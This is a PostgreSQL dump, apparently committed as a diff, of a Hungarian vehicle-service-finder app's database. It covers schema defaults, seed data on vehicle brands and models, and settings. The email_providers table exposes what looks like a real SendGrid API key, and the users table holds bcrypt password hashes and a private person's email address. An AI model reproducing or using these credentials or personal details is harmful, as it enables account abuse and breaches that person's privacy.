SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.votes_id_seq OWNED BY data.votes.id; + + +-- +-- Name: alembic_version; Type: TABLE; Schema: public; Owner: kincses +-- + +CREATE TABLE public.alembic_version ( + version_num character varying(32) NOT NULL +); + + +ALTER TABLE public.alembic_version OWNER TO kincses; + +-- +-- Name: audit_logs id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.audit_logs ALTER COLUMN id SET DEFAULT nextval('data.audit_logs_id_seq'::regclass); + + +-- +-- Name: badges id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.badges ALTER COLUMN id SET DEFAULT nextval('data.badges_id_seq'::regclass); + + +-- +-- Name: companies id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.companies ALTER COLUMN id SET DEFAULT nextval('data.companies_id_seq'::regclass); + + +-- +-- Name: company_members id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.company_members ALTER COLUMN id SET DEFAULT nextval('data.company_members_id_seq'::regclass); + + +-- +-- Name: competitions id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.competitions ALTER COLUMN id SET DEFAULT nextval('data.competitions_id_seq'::regclass); + + +-- +-- Name: credit_logs id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.credit_logs ALTER COLUMN id SET DEFAULT nextval('data.credit_logs_id_seq'::regclass); + + +-- +-- Name: email_logs id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.email_logs ALTER COLUMN id SET DEFAULT nextval('data.email_logs_id_seq'::regclass); + + +-- +-- Name: email_provider_configs id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.email_provider_configs ALTER COLUMN id SET DEFAULT nextval('data.email_provider_configs_id_seq'::regclass); + + +-- +-- Name: email_providers id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.email_providers ALTER COLUMN id SET DEFAULT nextval('data.email_providers_id_seq'::regclass); + + +-- +-- Name: email_templates id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.email_templates ALTER COLUMN id SET DEFAULT nextval('data.email_templates_id_seq'::regclass); + + +-- +-- Name: legal_acceptances id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.legal_acceptances ALTER COLUMN id SET DEFAULT nextval('data.legal_acceptances_id_seq'::regclass); + + +-- +-- Name: legal_documents id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.legal_documents ALTER COLUMN id SET DEFAULT nextval('data.legal_documents_id_seq'::regclass); + + +-- +-- Name: level_configs id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.level_configs ALTER COLUMN id SET DEFAULT nextval('data.level_configs_id_seq'::regclass); + + +-- +-- Name: locations id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.locations ALTER COLUMN id SET DEFAULT nextval('data.locations_id_seq'::regclass); + + +-- +-- Name: org_subscriptions id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.org_subscriptions ALTER COLUMN id SET DEFAULT nextval('data.org_subscriptions_id_seq'::regclass); + + +-- +-- Name: organization_locations id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.organization_locations ALTER COLUMN id SET DEFAULT nextval('data.organization_locations_id_seq'::regclass); + + +-- +-- Name: organization_members id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.organization_members ALTER COLUMN id SET DEFAULT nextval('data.organization_members_id_seq'::regclass); + + +-- +-- Name: organizations id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.organizations ALTER COLUMN id SET DEFAULT nextval('data.organizations_id_seq'::regclass); + + +-- +-- Name: point_rules id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.point_rules ALTER COLUMN id SET DEFAULT nextval('data.point_rules_id_seq'::regclass); + + +-- +-- Name: points_ledger id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.points_ledger ALTER COLUMN id SET DEFAULT nextval('data.points_ledger_id_seq'::regclass); + + +-- +-- Name: regional_settings id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.regional_settings ALTER COLUMN id SET DEFAULT nextval('data.regional_settings_id_seq'::regclass); + + +-- +-- Name: service_providers id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.service_providers ALTER COLUMN id SET DEFAULT nextval('data.service_providers_id_seq'::regclass); + + +-- +-- Name: service_specialties id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.service_specialties ALTER COLUMN id SET DEFAULT nextval('data.service_specialties_id_seq'::regclass); + + +-- +-- Name: subscription_tiers id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.subscription_tiers ALTER COLUMN id SET DEFAULT nextval('data.subscription_tiers_id_seq'::regclass); + + +-- +-- Name: translations id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.translations ALTER COLUMN id SET DEFAULT nextval('data.translations_id_seq'::regclass); + + +-- +-- Name: user_badges id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.user_badges ALTER COLUMN id SET DEFAULT nextval('data.user_badges_id_seq'::regclass); + + +-- +-- Name: user_scores id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.user_scores ALTER COLUMN id SET DEFAULT nextval('data.user_scores_id_seq'::regclass); + + +-- +-- Name: user_stats id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.user_stats ALTER COLUMN id SET DEFAULT nextval('data.user_stats_id_seq'::regclass); + + +-- +-- Name: user_vehicles id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.user_vehicles ALTER COLUMN id SET DEFAULT nextval('data.user_vehicles_id_seq'::regclass); + + +-- +-- Name: users id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.users ALTER COLUMN id SET DEFAULT nextval('data.users_id_seq'::regclass); + + +-- +-- Name: vehicle_brands id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.vehicle_brands ALTER COLUMN id SET DEFAULT nextval('data.vehicle_brands_id_seq'::regclass); + + +-- +-- Name: vehicle_categories id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.vehicle_categories ALTER COLUMN id SET DEFAULT nextval('data.vehicle_categories_id_seq'::regclass); + + +-- +-- Name: vehicle_events id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.vehicle_events ALTER COLUMN id SET DEFAULT nextval('data.vehicle_events_id_seq'::regclass); + + +-- +-- Name: vehicle_models id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.vehicle_models ALTER COLUMN id SET DEFAULT nextval('data.vehicle_models_id_seq'::regclass); + + +-- +-- Name: vehicle_ownership id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.vehicle_ownership ALTER COLUMN id SET DEFAULT nextval('data.vehicle_ownership_id_seq'::regclass); + + +-- +-- Name: vehicle_variants id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.vehicle_variants ALTER COLUMN id SET DEFAULT nextval('data.vehicle_variants_id_seq'::regclass); + + +-- +-- Name: vehicles id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.vehicles ALTER COLUMN id SET DEFAULT nextval('data.vehicles_id_seq'::regclass); + + +-- +-- Name: verification_tokens id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.verification_tokens ALTER COLUMN id SET DEFAULT nextval('data.verification_tokens_id_seq'::regclass); + + +-- +-- Name: votes id; Type: DEFAULT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.votes ALTER COLUMN id SET DEFAULT nextval('data.votes_id_seq'::regclass); + + +-- +-- Data for Name: audit_logs; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.audit_logs (id, user_id, action, endpoint, method, payload, ip_address, user_agent, created_at) FROM stdin; +4 4 USER_REGISTERED /api/v2/auth/register POST \N 192.168.100.179 \N 2026-01-28 19:37:19.225767+00 +\. + + +-- +-- Data for Name: badges; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.badges (id, name, description, icon_url) FROM stdin; +\. + + +-- +-- Data for Name: companies; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.companies (id, name, tax_number, subscription_tier, owner_id) FROM stdin; +\. + + +-- +-- Data for Name: company_members; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.company_members (id, company_id, user_id, role, can_edit_service, can_see_costs, is_active) FROM stdin; +\. + + +-- +-- Data for Name: competitions; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.competitions (id, name, description, start_date, end_date, is_active) FROM stdin; +\. + + +-- +-- Data for Name: credit_logs; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.credit_logs (id, org_id, amount, description, created_at) FROM stdin; +2 1 10000.00 Kezdő tesztkeret 2026-01-26 22:47:12.891324+00 +\. + + +-- +-- Data for Name: email_logs; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.email_logs (id, email, type, sent_at, recipient, user_id, provider_id, status, email_type) FROM stdin; +1 \N \N 2026-01-28 19:37:19.482744+00 zs.gyongyossy@gmail.com 4 5 sent registration +\. + + +-- +-- Data for Name: email_provider_configs; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.email_provider_configs (id, name, provider_type, priority, settings, is_active, fail_count, max_fail_threshold, success_rate) FROM stdin; +1 SendGrid_Primary SENDGRID 1 {"api_key": "YOUR_SENDGRID_KEY_HERE"} t 0 3 100 +\. + + +-- +-- Data for Name: email_providers; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.email_providers (id, name, priority, provider_type, host, port, username, password_hash, is_active, daily_limit, current_daily_usage) FROM stdin; +2 Resend_Backup 2 API \N \N \N \N f 3000 0 +5 SendGrid 1 SMTP smtp.sendgrid.net 587 apikey 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 t 100 0 +\. + + +-- +-- Data for Name: email_templates; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.email_templates (id, type, subject, body_html) FROM stdin; +1 REGISTRATION Üdvözöljük a Service Finderben! \n

Kedves {{ name }}!

\n

Köszönjük a regisztrációt! Az aktiváláshoz kattints ide:

\n Fiók aktiválása\n

A link 24 óráig érvényes.

\n +\. + + +-- +-- Data for Name: legal_acceptances; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.legal_acceptances (id, user_id, document_id, accepted_at, ip_address, user_agent) FROM stdin; +\. + + +-- +-- Data for Name: legal_documents; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.legal_documents (id, title, content, version, region_code, language, is_active, created_at) FROM stdin; +1 Általános Szerződési Feltételek Ide jön az ÁSZF szövege... Kérjük görgessen az aljáig. v1.0 HU hu t 2026-01-26 10:09:00.632463+00 +2 Adatkezelési Tájékoztató (GDPR) Ide jön a GDPR szövege... Kérjük görgessen az aljáig. v1.0 HU hu t 2026-01-26 10:09:00.632463+00 +\. + + +-- +-- Data for Name: level_configs; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.level_configs (id, level_number, min_points, rank_name) FROM stdin; +\. + + +-- +-- Data for Name: locations; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.locations (id, name, address, latitude, longitude, created_at) FROM stdin; +\. + + +-- +-- Data for Name: org_subscriptions; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.org_subscriptions (id, org_id, tier_id, valid_from, valid_until, is_active) FROM stdin; +1 1 3 2026-01-26 22:47:12.891324+00 2030-01-01 00:00:00+00 t +\. + + +-- +-- Data for Name: organization_locations; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.organization_locations (id, organization_id, label, address, latitude, longitude, is_main_location, created_at) FROM stdin; +1 2 Budaörsi Telep Budaörs, Fő út 1. 47.46200000 18.95300000 t 2026-01-27 18:39:56.278217+00 +2 2 Pesti Gyorsszerviz Budapest, Váci út 10. 47.53100000 19.06900000 f 2026-01-27 18:39:56.278217+00 +\. + + +-- +-- Data for Name: organization_members; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.organization_members (id, organization_id, user_id, role, is_permanent) FROM stdin; +1 1 1 owner \N +\. + + +-- +-- Data for Name: organizations; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.organizations (id, name, org_type, tax_number, founded_at, validation_status, owner_id, ui_theme, created_at, theme, is_active, slug) FROM stdin; +1 Admin Flotta \N \N \N \N \N \N 2026-01-26 22:47:12.875535+00 system t admin-flotta +2 Gumi Mester Kft. SERVICE \N \N \N \N \N 2026-01-27 18:39:56.278217+00 system t gumi-mester-kft +\. + + +-- +-- Data for Name: point_rules; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.point_rules (id, action_key, points, description, is_active) FROM stdin; +\. + + +-- +-- Data for Name: points_ledger; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.points_ledger (id, user_id, points, reason, created_at) FROM stdin; +\. + + +-- +-- Data for Name: regional_settings; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.regional_settings (id, country_code, currency, is_active) FROM stdin; +\. + + +-- +-- Data for Name: service_providers; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.service_providers (id, name, address, category, status, source, validation_score, evidence_image_path, added_by_user_id, created_at) FROM stdin; +\. + + +-- +-- Data for Name: service_specialties; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.service_specialties (id, parent_id, name, slug) FROM stdin; +1 \N Karosszéria bodywork +2 \N Elektromos hajtás electric-drive +3 1 Fényezés painting +4 1 Lakatos munkák metal-work +9 3 Bolore Blue Technológia bolore-blue +\. + + +-- +-- Data for Name: subscription_tiers; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.subscription_tiers (id, name, rules, is_custom) FROM stdin; +1 Free {"max_vehicles": 1, "ai_verification": false} f +2 Premium {"fleet_report": true, "max_vehicles": 10, "ai_verification": true} f +3 VIP {"max_vehicles": 999, "ai_verification": true, "priority_support": true} f +\. + + +-- +-- Data for Name: system_settings; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.system_settings (key_name, value_json, description, region_code, tier_id, org_id) FROM stdin; +max_vehicles 3 Globális alapértelmezett járműlimit a Free csomagban \N \N \N +weight_distance 0.6 A távolság súlya a rangsorolásban (0.0 - 1.0) \N \N \N +weight_rating 0.4 Az értékelés súlya a rangsorolásban (0.0 - 1.0) \N \N \N +bonus_gold_service 500 Fix bónusz pont Gold fokozatú szervizeknek \N \N \N +match_limit_default 5 Hány találatot mutassunk alapból \N \N \N +audit_log_enabled true Minden felhasználói mozdulat naplózása (true/false) \N \N \N +audit_log_retention_days 90 Hány napig őrizzük meg a naplókat \N \N \N +registration_throttle_minutes 10 Bot-védelem: IP alapú regisztrációs korlát percekben \N \N \N +allowed_countries_list ["AT", "BE", "BG", "CY", "CZ", "DE", "DK", "EE", "ES", "FI", "FR", "GR", "HR", "HU", "IE", "IT", "LT", "LU", "LV", "MT", "NL", "PL", "PT", "RO", "SE", "SI", "SK"] Engedélyezett országkódok listája \N \N \N +\. + + +-- +-- Data for Name: translations; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.translations (id, key, lang_code, value, is_published) FROM stdin; +\. + + +-- +-- Data for Name: user_badges; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.user_badges (id, user_id, badge_id, earned_at) FROM stdin; +\. + + +-- +-- Data for Name: user_scores; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.user_scores (id, user_id, competition_id, points, last_updated) FROM stdin; +\. + + +-- +-- Data for Name: user_stats; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.user_stats (id, user_id, total_points, current_level, last_activity) FROM stdin; +\. + + +-- +-- Data for Name: user_vehicles; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.user_vehicles (id, vin, license_plate, variant_id, color, purchase_date, purchase_price, current_odometer, extras, current_org_id, created_at, is_deleted) FROM stdin; +\. + + +-- +-- Data for Name: users; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.users (id, email, first_name, last_name, birthday, is_active, is_banned, is_gdpr_deleted, previous_login_count, created_at, verified_at, hashed_password, role, is_superuser, is_company, updated_at, company_name, tax_number, region_code) FROM stdin; +1 admin@profibot.hu Admin Profibot \N t \N \N \N 2026-01-26 20:32:23.490817+00 \N $2b$12$97TXbl.pcuJhCzPboqczxeuIW0Lt8OOvT3JrvLIEaBvvgJ1kWcERq admin t f \N \N \N HU +4 zs.gyongyossy@gmail.com zsolt gyongyossy \N t \N \N \N 2026-01-28 19:37:19.225767+00 \N $2b$12$ZGTO7x2timOCvUf/hvehDOfqkCsqddC6nWuScXXGzNe5trsGqQuRi user f f \N \N \N HU +\. + + +-- +-- Data for Name: vehicle_brands; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.vehicle_brands (id, name, origin_country, slug, country_code, category_id) FROM stdin; +1 Honda \N honda JP \N +29 BMW \N bmw \N \N +30 Tesla \N tesla \N \N +31 Yamaha \N yamaha \N \N +32 Scania \N scania \N \N +33 Mercedes-Benz \N mercedes \N \N +35 Toyota \N \N \N 3 +36 Volkswagen \N \N \N 3 +37 Ford \N \N \N 3 +40 Audi \N \N \N 3 +42 Hyundai \N \N \N 3 +43 Kia \N \N \N 3 +44 Mazda \N \N \N 3 +45 Nissan \N \N \N 3 +46 Opel \N \N \N 3 +47 Peugeot \N \N \N 3 +48 Renault \N \N \N 3 +49 Skoda \N \N \N 3 +50 Suzuki \N \N \N 3 +51 Volvo \N \N \N 3 +52 Fiat \N \N \N 3 +53 Dacia \N \N \N 3 +54 Citroen \N \N \N 3 +56 Lexus \N \N \N 3 +57 Alfa Romeo \N \N \N 3 +58 Jaguar \N \N \N 3 +59 Land Rover \N \N \N 3 +60 Mitsubishi \N \N \N 3 +61 Subaru \N \N \N 3 +62 Seat \N \N \N 3 +63 Cupra \N \N \N 3 +64 Jeep \N \N \N 3 +65 Chevrolet \N \N \N 3 +66 Cadillac \N \N \N 3 +67 Buick \N \N \N 3 +68 GMC \N \N \N 3 +69 Dodge \N \N \N 3 +70 Ram \N \N \N 3 +71 Chrysler \N \N \N 3 +72 Acura \N \N \N 3 +73 Infiniti \N \N \N 3 +74 Lincoln \N \N \N 3 +75 Porsche \N \N \N 3 +76 Mini \N \N \N 3 +77 Smart \N \N \N 3 +78 Bentley \N \N \N 3 +79 Rolls-Royce \N \N \N 3 +80 Lamborghini \N \N \N 3 +81 Ferrari \N \N \N 3 +82 Maserati \N \N \N 3 +83 Aston Martin \N \N \N 3 +84 Bugatti \N \N \N 3 +85 Lotus \N \N \N 3 +86 McLaren \N \N \N 3 +87 Polestar \N \N \N 3 +88 Genesis \N \N \N 3 +89 BYD \N \N \N 3 +90 Geely \N \N \N 3 +91 Chery \N \N \N 3 +92 MG \N \N \N 3 +93 Lada \N \N \N 3 +94 Iveco \N \N \N 3 +95 Isuzu \N \N \N 3 +96 SsangYong \N \N \N 3 +97 Rover \N \N \N 3 +98 Saab \N \N \N 3 +99 Lancia \N \N \N 3 +100 Pontiac \N \N \N 3 +101 Saturn \N \N \N 3 +102 Hummer \N \N \N 3 +103 Oldsmobile \N \N \N 3 +106 Kawasaki \N \N \N 4 +108 BMW Motorrad \N \N \N 4 +109 Harley-Davidson \N \N \N 4 +110 Ducati \N \N \N 4 +111 KTM \N \N \N 4 +112 Triumph \N \N \N 4 +113 Royal Enfield \N \N \N 4 +114 Indian \N \N \N 4 +115 Aprilia \N \N \N 4 +116 Moto Guzzi \N \N \N 4 +117 Vespa \N \N \N 4 +118 Piaggio \N \N \N 4 +119 MV Agusta \N \N \N 4 +120 Norton \N \N \N 4 +121 Husqvarna \N \N \N 4 +122 Benelli \N \N \N 4 +123 Bimota \N \N \N 4 +124 Beta \N \N \N 4 +125 Gas Gas \N \N \N 4 +126 Sherco \N \N \N 4 +127 CF Moto \N \N \N 4 +128 Hyosung \N \N \N 4 +129 Keeway \N \N \N 4 +130 SYM \N \N \N 4 +131 Kymco \N \N \N 4 +132 Bajaj \N \N \N 4 +133 Zero \N \N \N 4 +135 Volvo Trucks \N \N \N 5 +136 MAN \N \N \N 5 +137 DAF \N \N \N 5 +139 Mercedes-Benz Trucks \N \N \N 5 +140 Renault Trucks \N \N \N 5 +141 MACK \N \N \N 5 +142 Peterbilt \N \N \N 5 +143 Kenworth \N \N \N 5 +144 Ford Commercial \N \N \N 6 +145 Volkswagen Commercial \N \N \N 6 +146 Iveco Daily \N \N \N 6 +147 Mercedes-Benz Vans \N \N \N 6 +148 Fiat Professional \N \N \N 6 +\. + + +-- +-- Data for Name: vehicle_categories; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.vehicle_categories (id, name, slug) FROM stdin; +1 Személyautó car +2 Motorkerékpár motorcycle +3 CAR \N +4 MOTORCYCLE \N +5 TRUCK \N +6 VAN \N +\. + + +-- +-- Data for Name: vehicle_events; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.vehicle_events (id, vehicle_id, service_provider_id, event_type, description, odometer_reading, event_date) FROM stdin; +\. + + +-- +-- Data for Name: vehicle_models; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.vehicle_models (id, brand_id, category_id, name, year_start, year_end, slug) FROM stdin; +1 1 \N Civic \N \N civic +2 1 \N Accord \N \N accord +3 1 \N CR-V \N \N cr-v +4 1 \N Jazz \N \N jazz +5 1 \N HR-V \N \N hr-v +6 1 \N NSX \N \N nsx +34 29 \N 320d \N \N 320d +35 30 \N Model 3 \N \N model-3 +36 31 \N MT-07 \N \N mt-07 +37 32 \N R500 \N \N r500 +38 33 \N Actros \N \N actros +39 1 \N Africa Twin \N \N africa-twin +44 1 \N CB 500 \N \N \N +46 29 \N 3 Series \N \N \N +47 29 \N 5 Series \N \N \N +48 29 \N X5 \N \N \N +49 29 \N X3 \N \N \N +50 29 \N 1 Series \N \N \N +51 29 \N 7 Series \N \N \N +53 31 \N R1 \N \N \N +54 31 \N Tracer 900 \N \N \N +55 31 \N Ténéré 700 \N \N \N +56 31 \N XMAX \N \N \N +57 32 \N R-series \N \N \N +58 32 \N S-series \N \N \N +59 32 \N G-series \N \N \N +60 32 \N P-series \N \N \N +61 35 \N Corolla \N \N \N +62 35 \N Yaris \N \N \N +63 35 \N Hilux \N \N \N +64 35 \N RAV4 \N \N \N +65 35 \N C-HR \N \N \N +66 35 \N Avensis \N \N \N +67 35 \N Land Cruiser \N \N \N +68 36 \N Golf \N \N \N +69 36 \N Passat \N \N \N +70 36 \N Polo \N \N \N +71 36 \N Tiguan \N \N \N +72 36 \N Touran \N \N \N +73 36 \N Transporter \N \N \N +74 36 \N Caddy \N \N \N +\. + + +-- +-- Data for Name: vehicle_ownership; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.vehicle_ownership (id, vehicle_id, user_id, role, license_plate, is_active, start_date, end_date) FROM stdin; +1 3 1 owner BMW-320-DE t 2026-01-26 \N +2 4 1 owner EL-TESLA-01 t 2026-01-26 \N +3 5 1 owner MOTO-001 t 2026-01-26 \N +4 6 1 owner HON-AFR-01 t 2026-01-26 \N +5 7 1 owner TRUCK-01 t 2026-01-26 \N +6 8 1 owner KAMION-01 t 2026-01-26 \N +\. + + +-- +-- Data for Name: vehicle_variants; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.vehicle_variants (id, model_id, engine_size, power_kw, spec_data) FROM stdin; +\. + + +-- +-- Data for Name: vehicles; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.vehicles (id, model_id, license_plate, vin, manufacture_year, color, created_at, updated_at, category, current_odometer, engine_number, base_color) FROM stdin; +1 1 PRO-F1-01 HONDA123456789 2024 Sonic Grey 2026-01-26 20:39:18.015641+00 2026-01-26 20:39:18.015641+00 \N 0 \N \N +3 34 \N VIN-BMW-CAR-001 2022 \N 2026-01-26 21:48:09.085387+00 2026-01-26 21:48:09.085387+00 land 45000 \N \N +4 35 \N VIN-TSL-ELE-002 2023 \N 2026-01-26 21:48:09.085387+00 2026-01-26 21:48:09.085387+00 land 12000 \N \N +5 36 \N VIN-YAM-MOT-003 2021 \N 2026-01-26 21:48:09.085387+00 2026-01-26 21:48:09.085387+00 land 8500 \N \N +6 39 \N VIN-HON-MOT-004 2024 \N 2026-01-26 21:48:09.085387+00 2026-01-26 21:48:09.085387+00 land 500 \N \N +7 37 \N VIN-SCA-TRU-005 2020 \N 2026-01-26 21:48:09.085387+00 2026-01-26 21:48:09.085387+00 land 350000 \N \N +8 38 \N VIN-MER-TRU-006 2021 \N 2026-01-26 21:48:09.085387+00 2026-01-26 21:48:09.085387+00 land 280000 \N \N +\. + + +-- +-- Data for Name: verification_tokens; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.verification_tokens (id, user_id, token, token_type, expires_at, created_at, token_hash, is_used) FROM stdin; +4 4 \N email_verify 2026-01-30 19:37:19.480563+00 2026-01-28 19:37:19.225767+00 8eba078dc9ab1f95c7189efb68723b19146e34b4e48dc6e30dfee3b4f2655532 t +\. + + +-- +-- Data for Name: votes; Type: TABLE DATA; Schema: data; Owner: kincses +-- + +COPY data.votes (id, user_id, provider_id, vote_value) FROM stdin; +\. + + +-- +-- Data for Name: alembic_version; Type: TABLE DATA; Schema: public; Owner: kincses +-- + +COPY public.alembic_version (version_num) FROM stdin; +10b73fee8967 +\. + + +-- +-- Name: audit_logs_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.audit_logs_id_seq', 4, true); + + +-- +-- Name: badges_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.badges_id_seq', 1, false); + + +-- +-- Name: companies_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.companies_id_seq', 1, false); + + +-- +-- Name: company_members_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.company_members_id_seq', 1, false); + + +-- +-- Name: competitions_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.competitions_id_seq', 1, false); + + +-- +-- Name: credit_logs_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.credit_logs_id_seq', 2, true); + + +-- +-- Name: email_logs_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.email_logs_id_seq', 1, true); + + +-- +-- Name: email_provider_configs_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.email_provider_configs_id_seq', 1, true); + + +-- +-- Name: email_providers_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.email_providers_id_seq', 5, true); + + +-- +-- Name: email_templates_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.email_templates_id_seq', 1, true); + + +-- +-- Name: legal_acceptances_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.legal_acceptances_id_seq', 1, false); + + +-- +-- Name: legal_documents_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.legal_documents_id_seq', 2, true); + + +-- +-- Name: level_configs_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.level_configs_id_seq', 1, false); + + +-- +-- Name: locations_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.locations_id_seq', 1, false); + + +-- +-- Name: org_subscriptions_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.org_subscriptions_id_seq', 1, true); + + +-- +-- Name: organization_locations_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.organization_locations_id_seq', 2, true); + + +-- +-- Name: organization_members_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.organization_members_id_seq', 1, true); + + +-- +-- Name: organizations_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.organizations_id_seq', 2, true); + + +-- +-- Name: point_rules_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.point_rules_id_seq', 1, false); + + +-- +-- Name: points_ledger_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.points_ledger_id_seq', 1, false); + + +-- +-- Name: regional_settings_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.regional_settings_id_seq', 1, false); + + +-- +-- Name: service_providers_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses 